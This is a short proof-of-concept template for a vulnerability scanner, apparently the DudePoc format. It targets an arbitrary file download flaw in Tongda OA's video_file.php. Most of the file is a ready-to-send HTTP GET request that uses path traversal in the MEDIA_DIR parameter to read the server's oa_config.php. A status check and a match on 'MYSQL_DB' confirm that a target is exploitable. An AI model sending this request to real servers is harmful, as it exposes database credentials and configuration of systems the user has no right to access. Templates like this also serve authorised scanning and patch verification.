<DudePoc_Name>通达 OA video_file.php任意文件下载漏洞</DudePoc_Name>
<DudePoc_Description>通达OA 2017前台任意文件下载，2022攻防演习期间，通达OA被曝存在任意文件下载漏洞，攻击者可以利用漏洞直接获取服务器敏感信息。</DudePoc_Description>
<DudePoc_SetHeader>
GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1
Host: $<AttackHost>$
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>MYSQL_DB</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
